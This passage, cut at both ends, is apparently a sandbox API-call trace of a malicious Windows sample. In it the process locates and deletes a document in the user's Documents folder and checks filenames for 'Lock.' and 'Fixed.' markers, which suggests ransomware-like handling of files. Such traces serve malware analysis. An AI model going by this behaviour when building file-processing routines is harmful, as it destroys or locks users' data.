wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0221.775] CryptReleaseContext (hProv=0xa7c330, dwFlags=0x0) returned 1 [0221.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.775] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.775] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.775] FreeLibrary (hLibModule=0x76390000) returned 1 [0221.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.775] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.775] CloseHandle (hObject=0x50c) returned 1 [0221.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.776] CloseHandle (hObject=0x4dc) returned 1 [0221.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.778] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.778] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.778] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.778] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/wdchYxA7KRrFzTiR.odp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\wdchYxA7KRrFzTiR.odp", lpFilePart=0x8cedf4*="wdchYxA7KRrFzTiR.odp") returned 0x2e [0221.778] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\wdchYxA7KRrFzTiR.odp" (normalized: "c:\\users\\fd1hvy\\documents\\wdchyxa7krrfztir.odp")) returned 0x20 [0221.778] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\wdchYxA7KRrFzTiR.odp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd8d4f0, ftCreationTime.dwHighDateTime=0x1d5cfda, ftLastAccessTime.dwLowDateTime=0xa8779d00, ftLastAccessTime.dwHighDateTime=0x1d5cf8c, ftLastWriteTime.dwLowDateTime=0xa8779d00, ftLastWriteTime.dwHighDateTime=0x1d5cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x318d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="wdchYxA7KRrFzTiR.odp", cAlternateFileName="WDCHYX~1.ODP")) returned 0x9e1db8 [0221.778] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\wdchYxA7KRrFzTiR.odp" (normalized: "c:\\users\\fd1hvy\\documents\\wdchyxa7krrfztir.odp")) returned 1 [0221.786] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd8d4f0, ftCreationTime.dwHighDateTime=0x1d5cfda, ftLastAccessTime.dwLowDateTime=0xa8779d00, ftLastAccessTime.dwHighDateTime=0x1d5cf8c, ftLastWriteTime.dwLowDateTime=0xa8779d00, ftLastWriteTime.dwHighDateTime=0x1d5cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x318d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="wdchYxA7KRrFzTiR.odp", cAlternateFileName="WDCHYX~1.ODP")) returned 0 [0221.786] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0221.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38543f8 | out: hHeap=0x2af0000) returned 1 [0221.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0221.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.786] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0221.787] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0221.787] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0221.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0221.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a749e8 [0221.788] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/wdchYxA7KRrFzTiR.odp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\wdchYxA7KRrFzTiR.odp", lpFilePart=0x8cf650*="wdchYxA7KRrFzTiR.odp") returned 0x2e [0221.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0221.788] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\wdchYxA7KRrFzTiR.odp" (normalized: "c:\\users\\fd1hvy\\documents\\wdchyxa7krrfztir.odp")) returned 0xffffffff [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38541a0 | out: hHeap=0x2af0000) returned 1 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0221.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0221.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrMr9 Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rMr9 Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mr9 Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r9 Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9 Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fyz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yz8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0221.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrMr9 Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rMr9 Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mr9 Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r9 Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9 Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fyz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yz8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0221.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0221.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a734f8 | out: hHeap=0x2af0000) returned 1 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.792] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0221.792] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0221.792] CharUpperBuffW (in: 